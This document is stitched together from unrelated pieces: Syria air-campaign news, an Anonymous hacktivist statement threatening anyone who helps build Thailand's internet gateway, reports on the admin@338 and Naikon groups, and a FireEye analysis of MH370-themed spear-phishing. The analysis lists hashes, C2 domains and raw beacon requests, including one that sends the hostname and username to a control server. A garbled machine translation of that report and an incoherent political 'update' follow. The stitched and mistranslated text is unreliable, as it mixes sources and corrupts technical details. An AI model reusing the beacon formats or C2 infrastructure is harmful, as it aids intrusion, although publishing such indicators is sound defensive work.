France has 18 Rafales and eight Super Etendards fighter jets striking IS in Syria from the Charles de Gaulle aircraft carrier, stationed in the eastern Mediterranean Sea.
In addition to that, France has six Mirage 2000 based in Jordan, as well as six Rafale aircraft and one Atlantique reconnaissance aircraft based in the UAE.


Russia also launched air strikes in Syria in September. Vladimir Putin says the strikes target IS and Islamic extremists, but Russia has been criticised for allegedly targeting moderate rebel groups in Syria.
Russia has four SU-30 multirole fighter jets, 12 SU-25 ground attack aircrafts, and 11 SU-24 attack planes operating in Syrian airspace.
It also has at least four warships stationed in the Caspian Sea: one Gepard-class frigate and three Buyan-M-class corvettes, all capable of firing cruise missiles into Syria.


Britain is set to join the campaign against IS in Syria after the House of Commons voted in favour of the move.
Britain has eight Tornado jets at a Royal Air Force air base in Cyprus. These Tornados currently conduct strike missions against IS targets in Iraq.
The planes are equipped with two types of armaments: the large GPS- and laser-guided Paveway bombs and the smaller, highly accurate Brimstone missiles, which are designed to deliver a focused strike that reduces the likelihood of civilian casualties and unintentional damage.
Britain also has 10 Reaper drones in the region. They are operated remotely by ground-based pilots and can carry both Hellfire missiles and laser-guided, 500-pound bombs.


Germany will not conduct air strikes in Syria, but has approved plans for the country to join the military campaign, a big step for the country which has long resisted a direct role in the conflict.
Chancellor Angela Merkel's government has agreed to send Tornado reconnaissance jets, refuelling aircraft, a frigate to protect a French aircraft carrier, and up to 1,200 soldiers to the region.


RT AnonRRD: : Hacks Thai Police Servers, Proves Its Point

Anon Mask

#OpSingleGateway: Anonymous Hacks Thai Police Servers, Proves Its Point

In a reminder of the staggering cybersecurity inadequacies of a country gearing to set up a new national firewall, online hacktivist collective Anonymous has hacked the servers of Thailand’s police department.
Hacked readers will know of Thailand’s military government’s aim to squeeze all internet communication into a single gateway. If you aren’t aware of the master plan, Thailand’s Prime Minister General Prayut Chan-o-cha and his cabinet ordered the country’s National Police Department, the Information and Communication Ministry along with the Justice Ministry to look into the means to set up a single gateway for the internet. Thai flag

A resolution was passed soon after, mandating the agencies to look into laws that would need to either be enacted or amended, as a means to enforce the single Internet gateway.
To nobody’s surprise, state-run company CAT Telecom was chosen by the Prime Minister as the only authority to control all internet communications through the single gateway in Thailand.

With public backlash from the Thai people along with criticism from around the world, the government’s public stance has since changed. The Prime Minister stated that he hadn’t “ordered’ the agencies to go ahead with the mandate and that he had merely only suggested the endeavor as a study. The backtracking convinced few, least of all the Thai people and hacktivist group Anonymous.

#OpSingleGateway Continues

Anonymous targeted telecom company CAT in an operation called Single Gateway. By hacking multiple Thai government websites, Anonymous, and F5CyberArmy, a group of Thai gamers revealed the lowly security measures enforced by CAT Telecom by pseudo-doxing the records of thousands of CAT Telecom customers.
The hacktivist groups did not disclose the plaintext credentials of everyday users but did reveal the lack of cybersecurity controls employed at a company that was tasked to monitor the internet communication flow of an entire country.
In a recent posting on Twitter a month after the operation began, Anonymous confirmed that #OpSingleGateway is still “alive and well,” in the stand taken for freedom of speech and privacy of the Thai people.

The new statement by Anonymous noted that governmental plans for the single gateway are still in motion. The group also elaborated on the dangers of having a government watchdog and controller, one that records and monitors all internet activity coming in and within the country.
The statement read:
Hello, world.
Anonymous has been watching the conditions that are necessary for an open, tamper-free internet and freedom of speech systematically attacked within the kingdom of Thailand.
Anonymous will not sit idly by and watch another nation construct a Great Firewall, as China has done to keep its citizens from experiencing the competing viewpoints and ideologies that make up free and open discourse online.
The Thai military junta want to centralize and control completely the means with which the Thai people access the internet. This will enable them to monitor, censor or even entirely disable internet communications into and out of Thailand.
Although there have been numerous clarifications, denials, and confusing statements about the prospects of a single internet gateway in Thailand, it is our understanding that these plans are still in motion, still receiving funding, and still very much part of the government agenda.
As a previous statement by Anonymous Asia on behalf of OpSingleGateway stated:
"It is unacceptable that you promote your own people, army executives at the Head of the largest Telecommunication operator: CAT Telecom. Any Corporations or individuals helping to deploy this single gateway will be targeted by any electronic means.
We will not only fight against the single gateway project but will expose your incompetence to the world, where depravity and personal interests prevail."
If you are a Thai citizen, understand that your data, the records of what websites you access or who you speak with online, and what you say to them is not safe in the possession of your government.
How do we know this?
Because their data is not safe from Anonymous.
Your government wants you to trust their motives in collecting information on your online activities; they want you to trust that they will be able to secure this data and will only use it for lawful means.
 They cannot guarantee any of this.
 If a single gateway for access to the internet outside of Thailand is created, with the inevitable accompanying databases that will contain details of traffic passing through the gateway, it will get hacked.
Imagine your entire life sitting on a single, poorly secured server. Credit card and banking details, private emails to your husbands and wives, pictures of your children, every website you have ever visited, everything that makes up the most intimate and private parts of your life - all open and waiting for anyone of ill-intent to steal and use however they wish. We are not trying to scare you. We are trying to highlight the risks your government wants to create for you, for your family, for your business. Under the guise of "increased security" and "vigilance," they will have exposed you in the most dangerous way possible to anyone who has the ability to circumvent their poorly-secured servers.
Ask yourself, is this "security" going to benefit you, or benefit the government that refuses to acknowledge the criticisms and concerns of its citizenry?
Facebook, Google, and Microsoft are being pressured to provide information on critics of the Thai junta, in a struggle between corporations and governments it will always be the average citizens who suffer.
We are with you, we want to show you the risks to your liberty and privacy, please stand with Anonymous and tell your government that this is wrong for the people of Thailand.
To prove our point we are demonstrating the inability of the Thai government to secure even their own police servers, it is pitiful and should worry all of Thailand.
Your police are protecting their files with passwords like 12345; it would be funny if it weren't so sad.
Anonymous is watching.
True to their word, Anonymous proved the vulnerability of Thailand’s police servers by revealing a dump file (password-protected) consisting of several records.
Anon #OpSingleGateway 1
Anon #OpSingleGateway 2
The effort is to be seen as one to show the Thai people just how susceptible government websites and servers are to a hack and a breach.
The likelihood of a data breach targeting servers containing piles of information is high, as evidenced by breaches that make headlines every day. The likelihood of a breach targeting government websites and servers that could potentially snoop into and control the internet traffic of an entire country of 67 million people - is entirely likely. And it is worrying, for good reason.
With the most recent update, it appears that #OpSingleGateway still has the wind on its sails and will continue to persevere as long as Thailand’s Prime Minister, his cabinet and the Thai government continue to work on the singular gateway to control the internet in Thailand.
Images from Shutterstock.





Hackers use Dropbox to target Hong Kong media

Hong Kong activists have been targetted via Dropbox according to FireEye, with the Chinese government the top suspects.
Hackers use Dropbox to target Hong Kong media
Hackers use Dropbox to target Hong Kong media
Hong Kong journalists and activist groups were targeted by Chinese hackers, according to information from FireEye. This attack is part of a new trend where hackers go through social networking and cloud storage devices to foil detection efforts. There is some speculation in the media that it may have happened on a government level, possibly with the Chinese government involved.
FireEye released details about the attack earlier this week stating it was a uncategorised as an advanced persistent threat which analysts identified as having initially used a spear-phishing campaign. At this point it is unclear who is responsible for the attacks although it is speculated that it was a group identified as admin@338. The group used email messages with a 'Lowball file'.
Once the Lowball file has been downloaded it will execute a command to download two other files. One of these files act as a program to execute commands sent to the compromised device, while the other receives the commands and relays them to the main program. These files act as a basic remote access trojan which allow for the group to get information and scout out the device. If a device is deemed valuable another program, called bubblewrap, is installed to their Dropbox account, which allows the group to gain almost complete control of the system and starts running during the boot process.

This same program has been used by admin@338 before and can be traced to an IP address previously linked to it, although the address had not been used for some time. Previous links to this group have been mainly attributed to financial, economic and trade policy. It appears that it has recently moved to targeting Hong Kong media companies, possibly in response to new political unrest. The group seems to be mainly using publicly available RATs such as Poison Ivy.
It is believed this group is possibly linked to the Chinese government although no official ties have been made. There is strong evidence to suggest this due to the fact that the attack coincided with the Chinese government labeling pro-democracy movements as a criminal offence. Also the attacks seem to have targeted organisations with precisely the information Beijing would most likely seek to monitor.

 The Chinese government has also been faced with protests in Hong Kong, which it may be looking to monitor and tackle before they unravel.
After this breach in security was reported FireEye and Dropbox worked together and have since introduced countermeasures into their system. However it is possible that there are multiple versions of this software and FireEye believes there may be a second attack at some point soon. Although Dropbox may have been the target, Nick Rossman,threat intel manager at FireEye stated: “We don't believe that people or companies should be wary of using Dropbox or other open cloud services. In this instance, we have not observed Dropbox itself being compromised; the threat actors were using Dropbox as other “legitimate” users would.”
However, Nick Rossman makes the point that although Dropbox may be safe, the threat of using a cloud service like Dropbox is very real and companies should be aware of it. He notes that it its very common for people to use a service like Dropbox and companies should take relevant precautions to make it harder for hackers to access them in this way - especially as it allows them to hide very easily in the background and not get discovered.

 Iraqi News Logo

ISIS releases video showing beheading of alleged Russian spy

The shocking video showed a Russian-speaking terrorist murdering a man he accused of being a Moscow spy
The shocking video showed a Russian-speaking ISIS element beheading a man he accused of being a Moscow spy.
(IraqiNews.com) ISIS released video on Wednesday showing the beheading of a man it claims he had joined the organization but was in fact a Russian spy.
The video, which was released through one of the organization’s media channels, showed the victim wearing an orange suit.
Speaking in Russian, the prisoner allegedly confesses to working on behalf of the Russian Intelligence Service to gather information on ISIS and jihadis.
The execution was carried out by a Russian-speaking element of ISIS who addressed Vladimir Putin directly and threatened Moscow with attacks.

Scam Alert: Missing Malaysia Jet found in Bermuda Triangle Viral Facebook links are Malicious

 The scammers take advantage of every incident to trick people and get some bucks or likes on social media. Same is going on right now with the heartbreaking incident of missing Malaysian plane flight number MH370.
An alert for all our readers! A fake news about the missing Malaysian plane flight number MH370 is being circulated all over the Internet in which scammers are luring users to earn money by clicking a malicious video.

First it will ask you to verify your age, just to feel like link is trustworthy.
First it will ask you to verify your age, just to feel like the link is trustworthy.
Once you click the link, it redirects you to a malicious website.

This is how the preview of scam links looks like
This is how the preview of scam links looks like
Note the URL address in the screenshot given below:

This is how the fake video scam link look on Facebook
This is how the fake video scam link looks on Facebook
According to AlArabia , several articles and posts have been made on Facebook, Twitter and other social media platforms with catchy headlines and images such as:
  • Malaysia Plane (MH-370) Has Been Found Near Bermuda Triangle. BBC News: Recent Video Released!”

The scam goes viral on Twitter
The scam goes viral on Twitter

  • Shocking Video: Malaysian Airlines missing flight MH370 found at sea”
  • Malaysian Airplane MH370 Already Found. Shocking Video Release Today by CNN”
  • Plane has been spotted somewhere near Bermuda triangle. Shocking videos released today. CNN news”

That is how it's preview on Facebook looks like
That is how it's preview on Facebook looks like

  • MH370 Malaysia plane has been found. Shocking videos released today. The last video of passengers crying released”
Christopher Boyd of   Malwarebytes blog wrote a brief analysis on the ongoing scam, according to which:
  • Unfortunately, we have to warn you that scammers are looking to make some money off the back of the disappearance of Flight MH370 via the usual social media channels. The links typically lead to fake news / video sites, and encourage visitors to share the links to social media channels then either fill in surveys or click on adverts. It goes without saying that they won't be shown a crash video at the end of this process, because there is no crash video – just a sick hoax,”
This is not the first time when thugs and scammers have taken advantage of a heartbreaking incident. During the Philippines earthquake last year and the Japanese earthquake and tsunami of 2011, similar scams went viral.



Waqas Amir is a Dubai based cybersecurity journalist with a passion for covering latest happenings in cyber security and tech world. In addition to being the founder of this website, Waqas is also into gaming, reading and investigative journalism.




 *-Update - [02/12-2015] - By sharing the great chivalrous Anonymous "AnonRogue" the most accurate information, all kinds of the (last)  analysis, maybe must to  loaded more  to make the reader to figure out the same by the great chivalrous Anonymous "AnonRogue" as the most accurate information share the main focus! Authoritarian cunning  mainland demons Xi Jinping slander of Turkey!- Is you Xi Jinping = this a cunning devil still can face to Putin,Mr.??!-(By fireeye.com, hackread.com...)Also Thanksgiving~
Malware Used by China APT Group Abuses Dropbox

By Eduard Kovacs on December 01, 2015.

Attacks launched in August by a Chinese APT group against media organizations based in Hong Kong leveraged a piece of malware that abused Dropbox for command and control (C&C) communications, FireEye reported on Tuesday.
The security firm believes the cyber espionage campaign could be the work of a group identified as admin@338. The APT actor, active since 2008, has been seen targeting organizations in the financial services, telecoms, government, and defense sectors.
In August 2013, FireEye reported that admin@338 had been using the Poison Ivy RAT in its operations. In March 2014, the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank.
The same group is suspected of launching a spear phishing campaign in August against media organizations in Hong Kong. According to FireEye, the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed “LOWBALL.”
Once it infects a system, the LOWBALL backdoor uses the API provided by cloud storage service Dropbox for C&C communications. The malware allows attackers to collect information about the compromised device and the network it belongs to, which can be useful for further attacks.
The threat group’s Dropbox accounts have also been found to contain a different backdoor dubbed “BUBBLEWRAP.” This piece of malware, known to be used by admin@338 in the past, is a full-featured backdoor that collects information on the compromised host. It can also use various plugins to enhance its capabilities.
The recent attacks against Hong Kong newspapers, radio and TV stations coincided with charges brought against three Hong Kong students that were part of the 2014 pro-democracy movement.
Researchers have pointed out that it’s not uncommon for China-based threat groups to target Hong Kong media organizations, particularly ones whose reporting focuses on the pro-democracy movement. The August campaign was aimed at organizations holding information that could be of value to the Chinese government.
“Cyber threat groups’ access to the media organization’s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks,” FireEye said in a blog post.
While working with Dropbox to analyze the attacks aimed at Hong Kong media companies, FireEye discovered a second operation that might be conducted by admin@338, although experts say they lack conclusive evidence. The security firm has not been able to identify the victims of this second campaign.
“The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets,” experts said.
Related Reading: China Cybergang Using Hacking Team Exploits Against Financial Firm
Related Reading: Naikon Threat Group Linked to Chinese Army



Heavy! Malaysia Airlines MH370 missing alarming news

Updated: 2014-10-14 11:59 AM [NYT]
- See more at: http://translate.googleusercontent.com/translate_c?depth=1&hl=zh-TW&rurl=translate.google.com&sl=zh-CN&tl=en&u=http://www.ntdtv.com/xtr/b5/2014/10/14/a1146098.html&usg=ALkJrhhaL6ZWI-tZmjNSbHfalpvSREjzsg#sthash.mXll8CYX.dpuf



Naikon Threat Group Linked to Chinese Army

By Eduard Kovacs on September 24, 2015,

Cyber threat intelligence companies ThreatConnect and Defense Group released on Thursday a joint report linking the advanced persistent threat (APT) group known as “Naikon” to a unit of the Chinese People’s Liberation Army (PLA).
Naikon, a threat actor that has been active since at least 2010, has been targeting organizations around the South China Sea in search for geopolitical intelligence. The group has focused its efforts on breaching the systems of government, military and civil organizations in countries such as Malaysia, the Philippines, Cambodia, Vietnam, Indonesia, Myanmar, Singapore, Laos and Nepal.
The activities of what later would become known as the Naikon APT came to light in 2012 when a hacktivist using the online moniker “Hardcore Charlie” published thousands of documents allegedly stolen from the systems of a Beijing-based military contractor named the China National Import & Export Corp (CEIEC). The files appeared to come from the networks of various governments and businesses in the U.S. and countries in the South China Sea region.

The group’s operations and tools were later analyzed by researchers at Trend Micro, ThreatConnect, which in may 2014 noted that the actor’s efforts were aligned with the Chinese government’s interests, and Kaspersky, which noted in a report published earlier this year that the members of the group were Chinese speakers.
The report published now by ThreatConnect and Defense Group covers various aspects of Naikon’s operations, including infrastructure, tools and tactics. However, researchers have focused on the connection between Naikon and one of the PLA’s technical reconnaissance bureaus (TBRs), namely the one located in the Chinese city of Kunming and known as Unit 78020.
The report has been released just as Chinese President Xi Jinping heads to Washington for summit talks with his U.S. counterpart Barack Obama on topics such as cyber theft and the South China Sea.
The intelligence gathered by ThreatConnect and Defense Group for attribution purposes focuses on a dynamic domain used by Naikon since at least 2010, namely greensky27.vicp.net.
An analysis of the IP addresses associated with this domain shows that the city of Kunming is a central hub since a majority of connections have been traced there.
This and other data collected by experts has led them to believe that the individual controlling greensky27.vicp.net is located near or in Kunming. Further analysis has revealed that this person is likely a PLA officer named Ge Xing.
One of the clues tying Ge Xing to the greensky27.vicp.net domain is the “GreenSky27” moniker. The man has utilized this username on several online platforms, including the microblogging platform QQ Weibo, forums, and social media websites.
Account information collected by researchers along with photographs posted by GreenSky27 on the Web allowed investigators to determine that Ge Xing from Kunming is behind this online moniker. Furthermore, evidence available on Chinese websites and his online profiles shows the connection between this individual and the PLA.
“He launched his career as a PLA officer by attending the PLA International Studies University in 1998. Academic papers written by Ge Xing as a graduate student specifically place him at the Kunming TRB in 2008. Photos from his GreenSky27 QQ Weibo account from 2011 to 2014 place him at the Kunming TRB headquarters compound, underscoring his ongoing connection with the PLA,” researchers wrote in their report.

After finding evidence linking Ge Xing to the PLA, experts looked for clues showing the man’s involvement in the Naikon campaigns. Researchers determined that whenever Ge’s posts on personal accounts indicated that he was traveling outside of Kunming, the greensky27.vicp.net infrastructure was either offline or parked. The domain went dormant when Ge’s child was born and when he visited a memorial hall dedicated to his family’s ancestors.

ThreatConnect and Defense Group also noted that activity on the domain dropped considerably in May 2014 when the U.S. Department of Justice announced charging five Chinese military officers from the Army’s Unit 61398. On the same day, ThreatConnect published a report on Naikon’s activities.
In the report published this year, Kaspersky Lab pointed out that Naikon’s activities align closely with a group dubbed by FireEye “APT30.” Toni Gidwani, director of analysis and production at ThreatConnect, noted that APT30 is a different group.
“Although there appears to be some common targeting between the two APTs, there are differences between how the two register and manage their infrastructure,” Gidwani told SecurityWeek. “At this point in our research, we would not say they align closely although that certainly does not preclude the possibility of multiple China-based APTs targeting South China Sea equities.”




Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370

 While many advanced persistent threat (APT) groups have increasingly embraced strategic Web compromise as a malware delivery vector, groups also continue to rely on spear-phishing emails that leverage popular news stories. The recent tragic disappearance of flight MH 370 is no exception. This post will examine multiple instances from different threat groups, all using spear-phishing messages and leveraging the disappearance of Flight 370 as a lure to convince the target to open a malicious attachment.
“Admin@338” Targets an APAC Government and US Think Tank
The first spear phish from group “Admin@338” was sent to a foreign government in the Asian Pacific region on March 10, 2014 – just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, “Malaysian Airlines MH370.doc” (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of “decoy content” upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.
The attachment dropped a Poison Ivy variant into the path C:\DOCUME~1\admin\LOCALS~1\Temp\kav.exe (MD5: 9dbe491b7d614251e75fb19e8b1b0d0d), which, in turn, beaconed outbound to www.verizon.proxydns[.]com. This Poison Ivy variant was configured with the connection password “wwwst@Admin.” The APT group we refer to as Admin@338 has previously used Poison Ivy implants with this same password. We document the Admin@338 group's activities in our Poison Ivy: Assessing Damage and Extracting Intelligence paper. Further, the domain www.verizon.proxydns[.]com previously resolved to the following IP addresses that have also been used by the Admin@338 group:
IP Address First Seen Last Seen 2013-08-27 2013-08-28 2013-08-28 2013-08-31 2013-09-03 2014-03-07 2014-03-07 2014-03-19
A second targeted attack attributed to the same Admin@338 group was sent to a prominent US-based think tank on March 14, 2014. This spear phish contained an attachment that dropped “Malaysian Airlines MH370 5m Video.exe” (MD5: b869dc959daac3458b6a81bc006e5b97). The malware sample was crafted to appear as though it was a Flash video, by binding a Flash icon to the malicious executable.
Interestingly, in this case, the malware sets its persistence in the normal “Run” registry location, but it tries to auto start the payload from the disk directory “c:\programdata”, which doesn't exist until Windows 7, so a simple reboot would mitigate this threat on Windows XP. This suggests the threat actors did not perform quality control on the malware or were simply careless. We detect this implant as Backdoor.APT.WinHTTPHelper . The Admin@338 group discussed above has used variants of this same malware family in previous targeted attacks .
This specific implant beacons out to dpmc.dynssl[.]com:443 and www.dpmc.dynssl[.]com:80. The domain dpmc.dynssl[.]com resolved to the following IPs:
IP Address First Seen Last Seen 2013-11-01 2013-11-29 2014-01-10 2014-03-08 2014-03-14 2014-03-17 2014-03-17 2014-03-19
The www.dpmc.dynssl[.]com domain resolved to following IPs:
IP Address First Seen Last Seen 2013-10-30 2013-11-29 2014-01-10 2014-03-08 2014-03-14 2014-03-18 2014-03-17 2014-03-19
Note that the www.verizon.proxydns[.]com domain used by the Poison Ivy discussed above also resolved to both and during the same time frame as the Backdoor.APT.WinHTTPHelper command and control (CnC) located at dpmc.dynssl[.]com and www.dpmc.dynssl[.]com.
In addition to the above activity attributed to the Admin@338 group, a number of other malicious documents abusing the missing Flight 370 story were also seen in the wild. Other threat groups likely sent these other documents.
The Naikon Lures
On March 9, 2014, a malicious executable entitled the “Search for MH370 continues as report says FBI agents on way to offer assistance.pdf .exe“ (MD5: 52408bffd295b3e69e983be9bdcdd6aa) was seen circulating in the wild. This sample beacons to the CnC net.googlereader[.]pw:443. We have identified this sample, via forensic analysis, as Backdoor.APT.Naikon.
It uses a standard technique of changing its icon to make it appear to be a PDF, in order to lend to its credibility. This same icon, embedded as a PE Resource, has been used in the following recent samples:
MD5 Import hash CnC Server
fcc59add998760b76f009b1fdfacf840 e30e07abf1633e10c2d1fbf34e9333d6 ecoh.oicp[.]net
018f762da9b51d7557062548d2b91eeb e30e07abf1633e10c2d1fbf34e9333d6 orayjue.eicp[.]net
fcc59add998760b76f009b1fdfacf840 e30e07abf1633e10c2d1fbf34e9333d6 ecoh.oicp[.]net:443
498aaf6df71211f9fcb8f182a71fc1f0 a692dca39e952b61501a278ebafab97f xl.findmy[.]pw
a093440e75ff4fef256f5a9c1106069a a692dca39e952b61501a278ebafab97f xl.findmy[.]pw
125dbbb742399ec2c39957920867ee60 a692dca39e952b61501a278ebafab97f uu.yahoomail[.]pw
52408bffd295b3e69e983be9bdcdd6aa a692dca39e952b61501a278ebafab97f net.googlereader[.]pw
This malware leverages “pdfbind” to add a PDF into itself, as can be seen in the debugging strings, and when launched, the malware also presents a decoy document to the target:
The Plat1 Lures
On March 10, 2014, we observed another sample that exploited CVE-2012-0158, titled “MH370班机可以人员身份信息.doc” (MD5: 4ff2156c74e0a36d16fa4aea29f38ff8), which roughly translates to “MH370 Flight Personnel Identity Information”. The malware that is dropped by the malicious Word document, which we detect as Trojan.APT.Plat1, begins to beacon to via TCP over port 80. The decoy document opened after exploitation is blank. The malicious document dropped the following implants:
C:\Documents and Settings\Administrator\Application Data\Intel\ResN32.dll (MD5: 2437f6c333cf61db53b596d192cafe64) C:\Documents and Settings\Administrator\Application Data\Intel\~y.dll (MD5: d8540b23e52892c6009fdd5812e9c597)
The implants dropped by this malicious document both included unique PDB paths that can be used to find related samples. These paths were as follows:
E:\Work\T5000\T5 Install\ResN\Release\ResN32.pdb F:\WORK\PROJECT\T5 Install\InstDll\Release\InstDll.pdb
This malware family was also described in more detail here .
The Mongall/Saker Lures
Another sample leveraging the missing airliner theme was seen on March 12, 2014. The malicious document exploited CVE-2012-0158 and was titled, “Missing Malaysia Airlines Flight 370.doc” (MD5: 467478fa0670fa8576b21d860c1523c6). Although the extension looked like a Microsoft Office .DOC file, it was actually an .HTML Application (HTA) file. Once the exploit is successful, the payload makes itself persistent by adding a Windows shortcut (.LNK) file pointing to the malware in the “Startup” folder in the start menu. It beacons outbound to comer4s.minidns[.]net:8070. The network callback pattern, shown below, is known by researchers as “Mongall” or “Saker”:
GET /3010FC080[REDACTED] HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wis NT 5.0; .NET CLR 1.1.4322)
Host: comer4s.minidns.net:8070
Cache-Control: no-cache
The sample also drops a decoy file called “aa.doc” into the temp folder and displays the decoy content shown below:
The “Tranchulas” Lures
On March 18, 2014 a sample entitled “Malysia Airline MH370 hijacked by Pakistan.zip” was sent as a ZIP file (MD5: 7dff5c4ae1b1fea7ecbf7ab787da3468) that contained a Windows screensaver file disguised as a PDF (MD5: b03edbb264aa0c980ab2974652688876). The ZIP file was hosted on This IP address was previously used to host malicious files.
The screen saver file drops “winservice.exe” (MD5: 828d4a66487d25b413cb19ef8ee7c783) which begins beaconing to This IP address was previously used to host a file entitled “obl_leaked_report.zip” (MD5: a4c7c79308139a7ee70aacf68bba814f).
The initial beacon to the command-and-control server is as follows:
POST /path_active.php?compname=[HOSTNAME]_[USERNAME] HTTP/1.1 Host:
Accept: */*
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
This same control server was used in previous activity .
The Page Campaign
A final malicious document was seen abusing the missing Flight 370 story on March 18, 2014. This document exploited CVE-2012-0158 and was entitled “MH370 PM statement 15.03.14 - FINAL.DOC” (MD5: 5e8d64185737f835318489fda46f31a6). This document dropped a Backdoor.APT.Page implant and connected to on both port 80 and 443. The initial beacon traffic over port 80 is as follows:
GET /18110143/page_32180701.html HTTP/1.1 Accept: */*
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
While many APT actors have adopted strategic Web compromise as a delivery vector, it is apparent that spear phishing via email-based attachments or links to zip files remain popular with many threat actors, especially when paired with lures discussing current media events. Network defenders should incorporate these facts into their user training programs and be on heightened alert for regular spear-phishing campaigns, which leverage topics dominating the news cycle.
Acknowledgement: We thank Nart Villeneuve and Patrick Olsen for their support, research, and analysis on these findings.


魚叉式網絡釣魚消息循環:APT演員槓桿利益在馬來西亞的航班MH 370的消失

 雖然許多高級持續性威脅(APT)集團日益接受網絡戰略妥協為惡意軟件傳遞載體,集團還繼續依賴於魚叉式網絡釣魚電子郵件,利用流行的新聞故事。 飛行MH 370最近的悲慘消失也不例外。 這篇文章將探討不同的威脅組的多個實例,所有使用的矛釣魚郵件以及利用飛行370的消失為誘餌說服目標打開惡意附件。
“管理@ 338”目標的一個亞太地區政府和美國智庫
從組“管理@ 338”第一矛網絡釣魚被送到外國政府在亞太地區在2014年3月10日 - 僅僅兩天後,飛行消失。 威脅者發出了魚叉式網絡釣魚電子郵件,標題為附件,“馬來西亞航空MH370.doc”(MD5:9c43a26fe4538a373b7f5921055ddeae)。 雖然威脅行為者通常包括某種形式的“引誘物含量”在成功開發(即,表示什麼收件人有望打開一個文件),在這種情況下,用戶被簡單地示出的空白文檔。
附 件下降了毒藤變到路徑C:\ DOCUME〜1 \ ADMIN \ LOCALS〜1 \ TEMP \ kav.exe(MD5:9dbe491b7d614251e75fb19e8b1b0d0d)[],這反過來,beaconed出境到 www.verizon.proxydns COM。 這毒常春藤變型配置了連接密碼“wwwst @聯繫。”該APT組我們稱之為管理@ 338以前使用過毒藤植入物與此相同的密碼。 我們記錄了管理員@ 338組的活動在我們的毒藤:評估損害和智力提取文件。 此外,域www.verizon.proxydns玉米預先解析為也已用於由管理員@ 338組下面的IP地址[。]:
IP地址 首先看 最後一次露面 2013年8月27日 2013年8月28日 2013年8月28日 2013年8月31日 2013年9月3日 2014年3月7日 2014年3月7日 2014年3月19日
第二針對性的攻擊歸於同一個管理@ 338組被送到了美國一家著名的智庫在3月14日,2014年矛釣魚包含的附件​​降至“馬來西亞航空MH3705米Video.exe”(MD5:b869dc959daac3458b6a81bc006e5b97) 。 該惡意軟件樣本製作的出現,彷彿這是一個Flash視頻,通過結合一個Flash圖標的惡意可執行文件。
有趣的是,在這種情況下,惡意軟件將其在正常的“運行”的註冊表位置的持久性,但它會嘗試自動開始從盤目錄“C:\ programdata”有效負載,不存在直到Windows 7中,所以一簡單的重新啟動將減輕對Windows XP的這一威脅。 這表明,威脅行為並沒有對惡意軟件進行質量控制,或者只是不小心。 我們發現該假體為Backdoor.APT.WinHTTPHelper。 管理員@上面所討論的338組採用了同樣的惡意軟件家族的變種在以前的有針對性的攻擊
這種特殊的植入物標出來dpmc.dynssl COM [。] [。] 443 www.dpmc.dynssl融為一體:80。 域名dpmc.dynssl COM解決以下IP地址[]:
IP地址 首先看 最後一次露面 2013年11月1號 2013年11月29日 2014年1月10日 2014年3月8日 2014年3月14日 2014年3月17日 2014年3月17日 2014年3月19日
該www.dpmc.dynssl COM域名解析為IP地址如下[。]:
IP地址 首先看 最後一次露面 2013年10月30日 2013年11月29日 2014年1月10日 2014年3月8日 2014年3月14日 2014年3月18日 2014年3月17日 2014年3月19日
需 要注意的是上面還解決了這兩個58.64.153.157和59.188.0.197同一時間內為Backdoor.APT.WinHTTPHelper 指揮和控制(CNC)在位於所用的毒藤的www.verizon.proxydns [。] .COM域名討論在dpmc.dynssl [。]玉米和www.dpmc.dynssl [。]玉米。
除了歸因於管理員@ 338組以上的活性,一些其他惡意文件濫用缺失航班370故事中也見到野外。 其他威脅的群體可能會發送這些其他文件。
3月9日,2014年,惡意可執行文件名為“搜索MH370繼續擔任報告上說的方法聯邦調查局特工提供assistance.pdf .EXE”(MD5:52408bffd295b3e69e983be9bdcdd6aa)被認為流傳在野外。 此示例信標數控net.googlereader私服[。]:443。 我們已經確定了這個樣本,經法醫分析,Backdoor.APT.Naikon。
它採用改變其圖標,使其看起來是一個PDF,為了借錢給其信譽的標準技術。 此相同的圖標,嵌入作為一個體育設備資源,已使用以下最近樣品中:
MD5 進口散 數控服務器
fcc59add998760b76f009b1fdfacf840 e30e07abf1633e10c2d1fbf34e9333d6 ecoh.oicp [。]淨
018f762da9b51d7557062548d2b91eeb e30e07abf1633e10c2d1fbf34e9333d6 orayjue.eicp [。]淨
fcc59add998760b76f009b1fdfacf840 e30e07abf1633e10c2d1fbf34e9333d6 ecoh.oicp網[] 443
498aaf6df71211f9fcb8f182a71fc1f0 a692dca39e952b61501a278ebafab97f xl.findmy [] PW
a093440e75ff4fef256f5a9c1106069a a692dca39e952b61501a278ebafab97f xl.findmy [] PW
125dbbb742399ec2c39957920867ee60 a692dca39e952b61501a278ebafab97f uu.yahoomail [] PW
52408bffd295b3e69e983be9bdcdd6aa a692dca39e952b61501a278ebafab97f net.googlereader [] PW
3月10日,2014年,我們觀察到另一個樣品是利用CVE-2012-0158,題為“MH370班機可以人員身份信息的.doc”(MD5:4ff2156c74e0a36d16fa4aea29f38ff8),大致翻譯為“MH370飛行人員身份信息”。 由惡意Word文檔中,我們發現作為Trojan.APT.Plat1下降的惡意軟件開始通過TCP通過端口80打開後開發是空白的誘餌文件航標59.188.253.216。 該惡意文檔回落以下植入物:
C:\ Documents和Settings \管理員\應用數據\英特爾\ ResN32.dll(MD5:2437f6c333cf61db53b596d192cafe64) C:\ Documents和Settings \管理員\應用數據\英特爾\〜y.dll(MD5:d8540b23e52892c6009fdd5812e9c597)
通過這個惡意文件掉線的植入物都包括可用於查找相關的樣品的獨特的PDB路徑。 這些路徑如下:
